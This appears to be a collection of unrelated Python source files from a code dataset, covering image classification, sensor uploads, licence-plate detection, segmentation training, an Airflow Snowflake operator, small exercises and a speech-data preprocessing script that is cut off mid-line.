1","sub_path":"2D_adr/debug/filter_test.py","file_name":"filter_test.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
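The nx sweep above doubles the mesh resolution at each level, so the observed spatial order of the filter error can be read off the CSV by taking log2 of the ratio of successive errors. A minimal sketch with hypothetical error values (the numbers are placeholders, not measured results):

from math import log2

errors = {50: 1.6e-3, 100: 4.1e-4}  # hypothetical L2 errors at nx = 50 and nx = 100
rate = log2(errors[50] / errors[100])
print(round(rate, 2))  # ~1.96, i.e. roughly second-order convergence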
+{"seq_id":"486754122","text":"import cv2\nimport numpy as np\nimport itertools\nfrom readcsv import saveData\nfrom readcsv import readData\nfrom getColor import getColor\n\n# New Moth data\n\n\n\n\n# Get Saved Moth data\nfileList = [\"C:/Users/master/Desktop/20190629/Smarf/MothData/Mothdata01.csv\",\"C:/Users/master/Desktop/20190629/Smarf/MothData/Mothdata02.csv\",\"C:/Users/master/Desktop/20190629/Smarf/MothData/Mothdata03.csv\",\"C:/Users/master/Desktop/20190629/Smarf/MothData/Mothdata04.csv\"]\ndist_data_total = readData(fileList)\ndist_avg_data_total = []\ndata = getColor(\"C:/Users/master/Desktop/20190629/Smarf/Picture/Adoxophyes orana/01_05.jpg\",5)\nnewdata = np.array(data)\nfor dist_data in dist_data_total:\n#dist_data = [[[1,2,3],[2,3,4],[5,3,2],[5,3,1]],[[1,2,3],[2,3,4],[5,3,2]],[[1,2,3],[2,3,4],[5,3,2]],[[1,2,3],[2,3,4],[5,3,2]],[[1,2,3],[2,3,4],[5,3,2]]]\n    dist_avg_data = []\n    dist_var_data = []\n    for i in dist_data:\n        if i == [[],[],[],[],[]]:\n            print(\"skipping empty colour record\")\n            break\n        print(\"=================\")\n        print(i)\n        print(\"=================\")\n\n        x = np.array(i)\n        y = x.astype(np.float)\n        avg = np.average(y, axis=0)\n        dist_avg_data.append(avg)\n        # varsum=0\n        # for j in i:\n        #     varsum=varsum+ (j[0]-avg[0])**2+(j[1]-avg[1])**2+(j[2]-avg[2])**2\n        # var=varsum/(np.size(i,axis=0)-1)\n        # dist_var_data.append(var)\n    dist_avg_data_total.append(dist_avg_data)\n    print(dist_avg_data)\n# the t-distribution applies when the population mean and variance are unknown\nlowdist = 1\nk = 0\norigin = 10000000\nclusterDistance = 1000000000\n# materialise the permutations of the five colour rows (indices 0..4) so the\n# same sequence can be re-iterated for every cluster\ncombn = list(itertools.permutations(range(5), 5))\nfor l, r in enumerate(dist_avg_data_total):\n    origin = 10000000  # best distance so far for this cluster\n    for i in combn:\n        distsum = 0\n        for j, k in enumerate(i):\n            distsum = distsum + np.linalg.norm(r[k] - data[j])**2\n        if distsum < origin:\n            origin = distsum\n            bestCombn = i\n    if origin < clusterDistance:\n        clusterDistance = origin\n        cluster = l\nsaveData(data, cluster)\n\nif(cluster==0):\n    print(\"This moth is ~~~1\")\nelif(cluster==1):\n    print(\"This moth is ~~~2\")\nelif(cluster==2):\n    print(\"This moth is ~~~3\")\nelif(cluster==3):\n    print(\"This moth is ~~~4\")\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"Codes/__pycache__/before/classifyMoth0701.py","file_name":"classifyMoth0701.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"509856131","text":"import thread\nimport mysql.connector\nimport time\n\n\"\"\"\nDatabase connection object\n\n- Shared between each thread\n\"\"\"\nclass Database(object):\n    def __init__(self, config):\n        self.config = config\n        self.lock = thread.allocate_lock()\n        \n        self.connect()\n    \n    def connect(self):\n        self.conn = mysql.connector.connect(**self.config)\n    \n    def addScore(self, team, service, status, output):\n        query = \"INSERT INTO checks(team_id, service_id, time, status, output) \" \\\n               \"VALUES (%s, %s, 
%s, %s, %s)\"\n args = (team, service, int(time.time()), status, output)\n \n self.lock.acquire()\n \n cursor = self.conn.cursor()\n cursor.execute(query, args)\n self.conn.commit()\n \n cursor.close()\n \n self.lock.release()\n \n def getTeams(self):\n result = []\n \n self.lock.acquire()\n \n cursor = self.conn.cursor()\n cursor.execute(\"SELECT * FROM teams WHERE active = 1\")\n \n row = cursor.fetchone()\n \n while row is not None:\n team_id = row[0]\n team_name = row[1]\n \n result.append({\n 'id': team_id,\n 'name': team_name,\n })\n \n row = cursor.fetchone()\n \n cursor.close()\n \n self.lock.release()\n \n return result\n \n def getTeamServices(self, team_id):\n result = []\n \n self.lock.acquire()\n \n conn = self.conn\n cursor1 = conn.cursor()\n cursor2 = conn.cursor()\n \n cursor1.execute(\"SELECT * FROM services WHERE enabled = 1\")\n row = cursor1.fetchone()\n \n while row is not None:\n service_id = row[0]\n service_name = row[1]\n module = row[2]\n \n cursor2.execute(\"SELECT `value` FROM services_data WHERE team_id = %s AND service_id = %s ORDER BY `order` ASC\", (team_id, service_id))\n \n args = []\n data = cursor2.fetchone()\n \n while data is not None:\n args.append(data[0])\n \n data = cursor2.fetchone()\n \n result.append({\n 'id': service_id,\n 'name': service_name,\n 'module': module,\n 'args': args\n })\n \n row = cursor1.fetchone()\n \n cursor1.close()\n cursor2.close()\n \n self.lock.release()\n \n return result","sub_path":"scoring/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"454887460","text":"from sklearn.metrics import precision_recall_curve\nfrom sklearn.model_selection import cross_val_predict\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ny_scores = cross_val_predict(\n sgd_clf, X_train, y_train_5, cv=3, method=\"decision_function\"\n)\nprecisions, recalls, thresholds = precision_recall_curve(y_train_5, y_scores)\n\n\ndef plot_precision_recall_vs_threshold(precisions, recalls, thresholds):\n plt.plot(thresholds, precisions[:-1], \"b--\", label=\"Precision\")\n plt.plot(thresholds, recalls[:-1], \"g-\", label=\"Recall\")\n plt.xlabel(\"Threshold\")\n plt.legend(loc=\"center left\")\n plt.ylim([0, 1])\n\n\nplot_precision_recall_vs_threshold(precisions, recalls, thresholds)\nplt.show()\n","sub_path":"handson-ml/ch3/5_classifier_threshold_chart.py","file_name":"5_classifier_threshold_chart.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"387950148","text":"def isAnagram(word1, word2):\n if len(word1) == len(word2):\n ans = 'is Anagram'\n for each in word1:\n if word1.count(each) != word2.count(each):\n ans = 'not Anagram'\n return ans\n else:\n return 'not Anagram'\n\n\n################ test ############\nreply = isAnagram('potter', 'retoop')\nprint(reply)\n","sub_path":"check_isAnagram.py","file_name":"check_isAnagram.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"142347998","text":"import autocomplete_light as al\nfrom presupuesto.models import Presupuesto, OrdenDeTrabajo\nfrom django.db.models import Q\nfrom django.utils.html import escape\nfrom django.contrib.auth.models import User\n\nclass UserAutocomplete(al.AutocompleteModelBase):\n\n def choice_html(self, choice):\n \"\"\"\n Format a choice using 
:py:attr:`choice_html_format`.\n        \"\"\"\n        return self.choice_html_format % (\n            escape(self.choice_value(choice)),\n            escape(self.choice_label(choice.first_name+\" \"+choice.last_name)))\n\nal.register(User, UserAutocomplete,\n    name='vendedor',\n    search_fields=['^first_name','^last_name'],\n\n    choices=User.objects.all(),\n    attrs={\n        'placeholder': 'Nombre o apellido',\n        'data-autocomplete-minimum-characters': 1,\n        'style':'width:140px'\n    },\n    widget_attrs={\n        'data-widget-maximum-values': 10,\n})\n","sub_path":"ventas/autocomplete_light_registry.py","file_name":"autocomplete_light_registry.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"559763815","text":"\"\"\"\nBefore continuing:\n * sudo apt-get update\n * sudo apt-get install build-essential python-dev python-openssl git\n\n * git clone https://github.com/adafruit/Adafruit_Python_DHT.git && cd Adafruit_Python_DHT\n * sudo python setup.py install\n\n * pip install requests\n\"\"\"\n\nimport Adafruit_DHT\nimport time\nimport requests\nimport math\n\nsensor = Adafruit_DHT.DHT11\npin = 14\n\ntoken = \"\"\ndeviceLabel = \"raspberry-pi-weather-station\"\nvariableTemperature = \"temperature\"\nvariableHumidity = \"humidity\"\n\ndef buildPayload(varTemp, varHum):\n    # read the sensor on every call so each request posts a fresh sample\n    humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)\n    payload = {\n        varTemp: int(temperature),\n        varHum: int(humidity)\n    }\n    return payload\n\ndef postRequest(payload):\n\n    # Header for HTTP request\n    url = \"http://things.ubidots.com\"\n    url = \"{}/api/v1.6/devices/{}\".format(url, deviceLabel)\n    headers = {\"X-Auth-Token\": token, \"Content-Type\": \"application/json\"}\n\n    # Make a HTTP request\n    status = 400\n    attempts = 0\n    while status >= 400 and attempts <= 5:\n        req = requests.post(url=url, headers=headers, json=payload)\n        status = req.status_code\n        attempts += 1\n        time.sleep(1)\n\n    # Process results\n    if status >= 400:\n        print('Error: check your credentials and internet connection')\n        return False\n\n    print('Info: request made properly, device is updated')\n    return True\n\ndef main():\n    payload = buildPayload(variableTemperature, variableHumidity)\n    print('Info: attempting to send data to Ubidots')\n    postRequest(payload)\n    print('Info: finished')\n\nif __name__ == '__main__':\n    while True:\n        main()\n        time.sleep(2)\n","sub_path":"2018-2019/Other/Maribor/Sensors/dht11-ubidots.py","file_name":"dht11-ubidots.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"427313899","text":"import cv2\nimport numpy as np\n\n\ndef order_points(pts):\n    # initialize a list of coordinates that will be ordered\n    # such that the first entry in the list is the top-left,\n    # the second entry is the top-right, the third is the\n    # bottom-right, and the fourth is the bottom-left\n    rect = np.zeros((4, 2), dtype=\"float32\")\n\n    # the top-left point will have the smallest sum, whereas\n    # the bottom-right point will have the largest sum\n    s = pts.sum(axis=1)\n    rect[0] = pts[np.argmin(s)]\n    rect[2] = pts[np.argmax(s)]\n\n    # now, compute the difference between the points, the\n    # top-right point will have the smallest difference,\n    # whereas the bottom-left will have the largest difference\n    diff = np.diff(pts, axis=1)\n    rect[1] = pts[np.argmin(diff)]\n    rect[3] = pts[np.argmax(diff)]\n\n    # return the ordered coordinates\n    return rect\n
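\n# Example: for the corners of an axis-aligned box given in scrambled order,\n# order_points(np.array([[10, 100], [100, 100], [100, 10], [10, 10]], dtype=\"float32\"))\n# returns [[10, 10], [100, 10], [100, 100], [10, 100]]:\n# top-left, top-right, bottom-right, bottom-left.\n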
\ndef four_point_transform(image, pts):\n    # obtain a consistent order of the points and unpack them\n    # individually\n    rect = order_points(pts)\n    (tl, tr, br, bl) = rect\n\n    # compute the width of the new image, which will be the\n    # maximum distance between bottom-right and bottom-left\n    # x-coordinates or the top-right and top-left x-coordinates\n    widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n    widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n    maxWidth = max(int(widthA), int(widthB))\n\n    # compute the height of the new image, which will be the\n    # maximum distance between the top-right and bottom-right\n    # y-coordinates or the top-left and bottom-left y-coordinates\n    heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n    heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n    maxHeight = max(int(heightA), int(heightB))\n\n    # now that we have the dimensions of the new image, construct\n    # the set of destination points to obtain a \"birds eye view\",\n    # (i.e. top-down view) of the image, again specifying points\n    # in the top-left, top-right, bottom-right, and bottom-left\n    # order\n    dst = np.array([\n        [0, 0],\n        [maxWidth - 1, 0],\n        [maxWidth - 1, maxHeight - 1],\n        [0, maxHeight - 1]], dtype=\"float32\")\n\n    # compute the perspective transform matrix and then apply it\n    M = cv2.getPerspectiveTransform(rect, dst)\n    warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n\n    # return the warped image\n    return warped\n\n\ndef automatic_brightness_and_contrast(image, clip_hist_percent=10):\n    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n    # Calculate grayscale histogram\n    hist = cv2.calcHist([gray],[0],None,[256],[0,256])\n    hist_size = len(hist)\n\n    # Calculate cumulative distribution from the histogram\n    accumulator = []\n    accumulator.append(float(hist[0]))\n    for index in range(1, hist_size):\n        accumulator.append(accumulator[index -1] + float(hist[index]))\n\n    # Locate points to clip\n    maximum = accumulator[-1]\n    clip_hist_percent *= (maximum/100.0)\n    clip_hist_percent /= 2.0\n\n    # Locate left cut\n    minimum_gray = 0\n    while accumulator[minimum_gray] < clip_hist_percent:\n        minimum_gray += 1\n\n    # Locate right cut\n    maximum_gray = hist_size -1\n    while accumulator[maximum_gray] >= (maximum - clip_hist_percent):\n        maximum_gray -= 1\n\n    # Calculate alpha and beta values\n    alpha = 255 / (maximum_gray - minimum_gray)\n    beta = -minimum_gray * alpha\n\n    auto_result = cv2.convertScaleAbs(image, alpha=alpha, beta=beta)\n    return auto_result, alpha, beta\n\n\ndef detect_belg(src):\n    img, alpha, beta = automatic_brightness_and_contrast(src)\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    ret, th = cv2.threshold(gray, 120, 255, cv2.THRESH_BINARY)\n\n    contours, hierarchy = cv2.findContours(th, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n    cv2.imwrite('temp/blurred.png', src)\n\n    crops = []\n    for cnt in contours:\n        x, y, w, h = cv2.boundingRect(cnt)\n\n        if h * 6 > w > 2 * h and h > 0.1 * w and w * h > img.shape[0] * img.shape[1] * 0.0001:\n            crop = th[y:y + h, x:x + w]\n\n            # Compute sum of white pixels\n            white_summation = crop.sum()\n            if white_summation > w * h * 0.4 * 255:\n                # Compute sum of red pixels\n                crop = img[y:y + h, x:x + w]\n                crop_img = crop.astype('uint8')\n                hsv = cv2.cvtColor(crop_img, cv2.COLOR_BGR2HSV)\n                lower_red = np.array([160, 100, 100])\n                upper_red = np.array([179, 255, 255])\n                red_mask = cv2.inRange(hsv, lower_red, upper_red)\n                red_summation = red_mask.sum()\n\n                if red_summation > 510:\n                    crop_img = img[y:y + h, x - round(w / 10):x + w]\n                    crop_img = crop_img.astype('uint8')\n                    hsv = 
cv2.cvtColor(crop_img, cv2.COLOR_BGR2HSV)\n                    low_bleu = np.array([100, 150, 0])\n                    high_bleu = np.array([140, 255, 255])\n                    bleu_mask = cv2.inRange(hsv, low_bleu, high_bleu)\n                    bleu_summation = bleu_mask.sum()\n\n                    if bleu_summation > 255:\n\n                        crop = gray[y:y + h, x:x + w]\n                        crop_img = crop.astype('uint8')\n                        th2 = cv2.adaptiveThreshold(crop_img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY,\n                                                    11, 2)\n\n                        contours2, hierarchy = cv2.findContours(th2, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n                        j = 0\n                        for c in contours2:\n                            area2 = cv2.contourArea(c)\n                            x2, y2, w2, h2 = cv2.boundingRect(c)\n                            if w2 * h2 > h * w * 0.01 and h2 > w2 and area2 < h * w * 0.9:\n                                j += 1\n\n                        if 12 > j > 4:\n                            rect = cv2.minAreaRect(cnt)\n                            box = cv2.boxPoints(rect)\n                            box = np.int0(box)\n                            pts = np.array(box)\n                            warped = four_point_transform(src, pts)\n                            crops.append(warped)\n\n                            cv2.drawContours(src, [box], 0, (0, 255, 0), 2)\n\n                            image = cv2.imread('temp/blurred.png')\n                            blurred_image = cv2.GaussianBlur(image, (43, 43), 30)\n                            mask = np.zeros(image.shape, dtype=np.uint8)\n                            channel_count = image.shape[2]\n                            ignore_mask_color = (255,) * channel_count\n                            cv2.fillPoly(mask, np.int32([box]), ignore_mask_color)\n                            mask_inverse = np.ones(mask.shape).astype(np.uint8) * 255 - mask\n                            final_image = cv2.bitwise_and(blurred_image, mask) + cv2.bitwise_and(image, mask_inverse)\n                            cv2.imwrite(\"temp/blurred.png\", final_image)\n    return src, crops\n\n\ndef process(src):\n\n    # Brightness and contrast adjustment\n    adjusted, a, b = automatic_brightness_and_contrast(src)\n    # BGR to gray\n    gray = cv2.cvtColor(adjusted, cv2.COLOR_BGR2GRAY)\n    # Binary thresh\n    #ret, th = cv2.threshold(gray, 140, 255, cv2.THRESH_BINARY)\n    ret, th = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n    return th\n","sub_path":"Belgian_anpr/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":7448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"398670127","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt  # plt is used in the training loop below; the import was missing\nfrom accuracy import *\nfrom DataReader import *\nfrom DRN import *\nimport os\nfrom dice import *\n\ntf.reset_default_graph()\ndirectory = os.getcwd()\n\ntrain_file = os.path.join(directory, 'data', 'train.txt')\ntest_file = os.path.join(directory, 'data', 'val.txt')\nlogs = os.path.join(directory, 'logs')\ntrainloss = os.path.join(logs, 'train_loss.txt')\n\n\nif not os.path.isdir(logs):\n    os.makedirs(logs)\n\n# choose network, can be either DRN18 or DRN26\nnetwork = 'DRN26'\n# set parameters\nbatch_size=8\nnum_epochs=100\nuse_weights = 1\nnum_classes = 5\nimage_dims=[500,500,3]\n\ndata = DataReader(directory, batch_size, num_epochs, use_weights=1)\ntrain_data = data.train_batch(train_file)\nnum_train_images = data.num_images\n\ntest_data = data.test_batch(test_file)\nnum_val_images = data.num_images\n\n# determine number of iterations based on number of images\ntraining_iterations = int(np.floor(num_train_images/batch_size))\nvalidation_iterations = int(np.floor(num_val_images/batch_size))\n\nhandle = tf.placeholder(tf.string, shape=[])\n# create iterator allowing us to switch between datasets\niterator = tf.data.Iterator.from_string_handle(handle, train_data.output_types, train_data.output_shapes)\nnext_element = iterator.get_next()\ntraining_iterator = train_data.make_initializable_iterator()\nval_iterator = test_data.make_initializable_iterator()\n\n# create placeholder for train or test\ntrain_network = tf.placeholder(tf.bool, [])\n
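\n# The string-handle pattern above lets one graph flip between datasets:\n# each make_initializable_iterator keeps its own position, and feeding its\n# string handle into 'handle' routes next_element to that iterator without\n# rebuilding the graph.\n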
\n# get images and pass into network\nimage, label, weight = next_element\ndrn = DRN(image, image_dims, batch_size, num_classes, train_network, network)\n\n# get predictions and logits\nprediction = drn.pred\nlogits = drn.prob\nlabel = tf.squeeze(label, 3)\n\n# resize the logits using bilinear interpolation\nimsize = tf.constant([image_dims[0], image_dims[1]], dtype=tf.int32)\nlogits = tf.image.resize_bilinear(logits, imsize)\nprediction = tf.argmax(logits, 3)\nprint('Resized shape is {}'.format(logits.get_shape()))\n\n\n# compute loss\nif use_weights == 1:\n    label_one_hot = tf.one_hot(label, num_classes)\n    loss = tf.nn.softmax_cross_entropy_with_logits(labels=label_one_hot, logits=logits)\n    loss = loss*tf.squeeze(weight, 3)\nelse:\n    # use sparse with flattened labelmaps\n    loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=label, logits=logits)\nloss = tf.reduce_mean(loss)\n\n#loss = dice(logits, label, num_classes, use_weights=1)\n\n# create summary\ntf.summary.scalar('loss', loss)\ntf.summary.image('images', image)\ntf.summary.image('predictions', tf.cast(tf.expand_dims(prediction, 3), dtype=tf.uint8))\ntf.summary.image('labels', tf.cast(tf.expand_dims(label, 3), dtype=tf.uint8))\n\n\n# add weights of first layer\nprint(tf.trainable_variables())\nfor var in tf.trainable_variables():\n    if '_1' in var.name:\n        tf.summary.histogram(var.name, var)\n#tf.summary.scalar('learning_rate', learning_rate)\nmerged = tf.summary.merge_all()\ntrain_writer = tf.summary.FileWriter(logs, tf.get_default_graph())\n\n# global step to keep track of iterations\nglobal_step = tf.Variable(0, trainable=False, name='global_step')\n\n# create placeholder for learning rate\nlearning_rate = tf.placeholder(tf.float32, shape=[])\n\n# training\ntraining = tf.train.AdamOptimizer(learning_rate).minimize(loss, global_step)\n\nsaver = tf.train.Saver(max_to_keep=3)\ninit = tf.global_variables_initializer()\n\nplt.figure(figsize=(18, 16))\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\n\nwith tf.Session(config=config) as sess:\n    training_handle = sess.run(training_iterator.string_handle())\n    validation_handle = sess.run(val_iterator.string_handle())\n    \n    sess.run(training_iterator.initializer)\n    # initialize variables\n    sess.run(init)\n    \n    # check if checkpoint exists\n    ckpt = tf.train.get_checkpoint_state(logs)\n    if ckpt and ckpt.model_checkpoint_path:\n        saver.restore(sess, ckpt.model_checkpoint_path)\n        print('Restoring session at step {}'.format(global_step.eval()))\n    \n    iteration = global_step.eval()\n    current_epoch = int(np.ceil(iteration/training_iterations))\n    \n    while current_epoch < num_epochs:\n        print(training_iterations)\n        current_epoch = int(np.ceil(iteration/training_iterations))\n        i = 1\n        while i <= training_iterations:\n            _, l = sess.run([training, loss], feed_dict={handle:training_handle, learning_rate:0.0001, train_network:True})\n            iteration = global_step.eval()\n            i = iteration - ((current_epoch-1)*training_iterations)\n\n            if iteration % 10 == 0:\n                print('Training loss Epoch {} step {}, {} :{}'.format(current_epoch, iteration, i, l))\n                # write loss to file\n                with open(trainloss, 'a') as f:\n                    f.write(\"Epoch: {} Step: {} Loss: {}\\n\".format(current_epoch, iteration, l))\n\n            if (iteration %250 == 0) and (iteration > 0):\n                # write summary to file\n                summary = sess.run(merged, feed_dict={handle:training_handle})\n                train_writer.add_summary(summary, iteration)\n                # save session\n                print('Saving session at epoch {} step: {}'.format(current_epoch, iteration))\n                saver.save(sess, logs + 
'/model.ckpt', global_step)\n\n \n sess.run(val_iterator.initializer)\n total_loss = 0\n for i in range(validation_iterations):\n print('validation step: {}'.format(i))\n img, lbl, wgt = next_element\n val_loss, img, lbl, wgt, pred = sess.run([loss, img, lbl, wgt, prediction], feed_dict={handle:validation_handle, train_network:False})\n total_loss += val_loss\n lbl = np.squeeze(lbl, 3)\n # evaluate accuracy\n accuracy = Jaccard(lbl, pred, num_classes)\n dice_score = DICE(lbl, pred, num_classes)\n\n if (i % 100 == 0) and (i >0):\n plt.subplot(131)\n img_temp = (img + abs(img.min()))/((abs(img.min()) + img.max()))\n plt.imshow(img_temp[0, :, :, :])\n plt.subplot(132)\n plt.imshow(np.squeeze(lbl[0, :, :]))\n # view prediction\n plt.subplot(133)\n plt.imshow(pred[0, :, :])\n plt.show()\n\n print(accuracy)\n print(dice_score)\n \nf.close()","sub_path":"train_network.py","file_name":"train_network.py","file_ext":"py","file_size_in_byte":6046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"652896196","text":"from pathlib import Path\n\nCUR_DIR = Path(__file__).resolve().parent\nDATA_FOLDER = CUR_DIR / 'sorted_files'\nFILES = [file for file in DATA_FOLDER.iterdir() if file.is_file() and file.suffix == '.txt']\n\n\ndef get_files_data_sorted_by_number_of_lines(files_path: list) -> list:\n \"\"\"\n Gets a list of paths to .txt files and returns a list of dictionaries with the name, the number of lines (length)\n and the content of .txt files\n\n Args:\n files_path (list): list of paths to .txt files\n\n Returns: A list of dictionaries\n\n \"\"\"\n list_of_file_parameters = []\n for file in files_path:\n file_parameters = {}\n with open(file, 'r', encoding='utf-8-sig') as f:\n content = f.read().splitlines()\n file_parameters['name'] = file.name\n file_parameters['length'] = len(content)\n file_parameters['content'] = content\n list_of_file_parameters.append(file_parameters)\n return sorted(list_of_file_parameters, key=lambda file_param: file_param[\"length\"])\n\n\ndef create_merged_file(merged_file_folder, files_path: list, merged_file_name: str):\n \"\"\"Gets a list of paths to .txt files, merged them and creates a new .txt file\n\n Args:\n merged_file_folder (path) : path to the folder to contain the merged file\n files_path (list): list of paths to the .txt files to merge\n merged_file_name (str): given name to the new file\n \"\"\"\n\n list_of_file_param = get_files_data_sorted_by_number_of_lines(files_path)\n merged_file_folder.mkdir(exist_ok=True)\n with open(f'{merged_file_folder}/{merged_file_name}.txt', 'w', encoding='utf-8-sig') as new_file:\n for i in range(len(list_of_file_param)):\n new_file.write(list_of_file_param[i]['name'] + '\\n')\n new_file.write(str(list_of_file_param[i]['length']) + '\\n')\n for j in range(len(list_of_file_param[i]['content'])):\n # To avoid adding an empty line at the end of the file\n n = '' if i == len(list_of_file_param) - 1 and j == len(list_of_file_param[i]['content']) - 1 else '\\n'\n new_file.write(list_of_file_param[i]['content'][j] + n)\n\n\ncreate_merged_file(CUR_DIR / 'merged_file', FILES, 'merged_files')\n","sub_path":"merging_files.py","file_name":"merging_files.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"647667177","text":"from airflow.hooks.S3_hook import S3Hook\nfrom airflow.plugins_manager import AirflowPlugin\nfrom airflow.models import BaseOperator\nfrom 
\n\nclass SnowflakeOperator(BaseOperator):\n\n    def __init__(self,\n                 query=None,\n                 query_file=None,\n                 role='public',\n                 snowflake_conn_id='snowflake_default',\n                 *args, **kwargs):\n\n        super(SnowflakeOperator, self).__init__(*args, **kwargs)\n        self.snowflake_conn_id = snowflake_conn_id\n        self.query_or_sequence = query\n        self.query_file = query_file\n        self.role = role\n\n    def execute(self, context):\n        hook = SnowflakeHook(snowflake_conn_id=self.snowflake_conn_id).get_conn()\n        cs = hook.cursor()\n        cs.execute(\"USE WAREHOUSE {0}\".format(hook.warehouse))\n        cs.execute(\"USE DATABASE {0}\".format(hook.database))\n        cs.execute(\"USE ROLE {0}\".format(self.role))\n\n        if self.query_or_sequence is None and self.query_file is None:\n            raise AirflowException('query or query_file must be supplied to the operator')\n\n        if self.query_or_sequence is not None:\n            if isinstance(self.query_or_sequence, list):\n                query_sequence = self.query_or_sequence\n            else:\n                query_sequence = [self.query_or_sequence]\n\n            for query in query_sequence:\n                cs.execute(query)\n\n        if self.query_file is not None:\n            if isinstance(self.query_file, list):\n                files_sequence = self.query_file\n            else:\n                files_sequence = [self.query_file]\n\n            for path in files_sequence:\n                # read each SQL file with a context manager so the handle is\n                # closed instead of leaking via open(path).read()\n                with open(path, 'r') as sql_file:\n                    query = sql_file.read()\n                cs.execute(query)\n","sub_path":"operators/snowflake_operator.py","file_name":"snowflake_operator.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"12488060","text":"favorite_languages = {\n\t'jen': 'python',\n\t'sarah': 'c',\n\t'edward': 'ruby',\n\t'phil': 'python',\n}\n\ntakePollPeople = [\"jen\",\"josh\",\"JC\"]\nfor i in takePollPeople:\n\t# initialise the match flag for every person; the original referenced t\n\t# before assignment, raising a NameError when the first name has no match\n\tt = 0\n\tfor k, v in favorite_languages.items():\n\t\t#print(name.title() + \"'s favorite language is \" + language.title()+\".\")\n\t\tif i == k:\n\t\t\tt = 1\n\tif t == 1:\n\t\tprint(\"Thank you \"+i+\" for taking the quiz!\")\n\telse:\n
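\t\t# (added, hedged) a dict membership test would replace the manual flag\n\t\t# entirely, e.g. \"if i in favorite_languages:\" instead of scanning items()\n\t\tprint(\"OMG!!!! 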
JUST TAKE THE QUIZ \"+i.upper()+\"!!!!!!!!!\")","sub_path":"Part 1: Basics/Chapter 6: Dictionaries/6-6:polling.py","file_name":"6-6:polling.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"7602077","text":"import os\nimport sys\n#sys.path.append(os.path.dirname(__file__))\n#sys.path.append('..')\n#sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))\nimport math\nimport numpy as np\nfrom scipy.signal import get_window\nimport librosa.util as librosa_util\nimport librosa\nfrom concurrent.futures import ProcessPoolExecutor\nfrom functools import partial\nfrom tqdm import tqdm\nfrom shutil import copyfile\nimport argparse\n\nimport torch, torch.nn as nn, torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\n\nif __package__ == '':\n from stts import audio, audio_util, util\nelse:\n from .stts import audio, audio_util, util\n \n \n \ndef _make_metafile(dir_base, subdir='train_data_01', metafile='train_meta.txt'):\n meta = []\n dir_data = os.path.join(dir_base, subdir)\n for a, b, c in os.walk(dir_data):\n if len(c) == 0:\n continue\n for fname in c:\n if 'txt' in fname:\n fpath = os.path.join(a, fname)\n with open(fpath, 'r') as f:\n lines = f.readlines()\n for line in lines:\n try:\n line = line.strip()\n idx_sep = line.index(' ')\n _flacfile = line[:idx_sep] + '.flac'\n _script = line[idx_sep+1:]\n except:\n continue\n else:\n _meta = (os.path.join(a[len(dir_base)+1:], _flacfile), _script)\n meta.append(_meta) \n with open(os.path.join(dir_base, metafile), 'w') as f:\n lines = ''\n for _meta in meta:\n lines += '|'.join(_meta) + '\\n'\n f.write(lines[:-1])\n return meta\n\ndef make_metafiles(dir_base, subdir_train='train_data_01', subdir_test='test_data_01'):\n _make_metafile(dir_base, subdir=subdir_train, metafile='train_meta.txt')\n _make_metafile(dir_base, subdir=subdir_test, metafile='test_meta.txt')\n \n\ndef read_metadata(data_dir, metafile='meta.txt'): \n metadata_path = os.path.join(data_dir, metafile)\n with open(metadata_path, 'r') as f:\n lines = f.readlines()\n meta = []\n for line in lines:\n wpath, ntext = line.strip().split('|')\n if ntext.endswith('\\n'):\n ntext = ntext[:-1]\n fname = wpath.split('/')[-1][:-5]\n meta.append((fname, os.path.join(data_dir, wpath), ntext))\n return meta\n\ndef preprocess(data_dir, 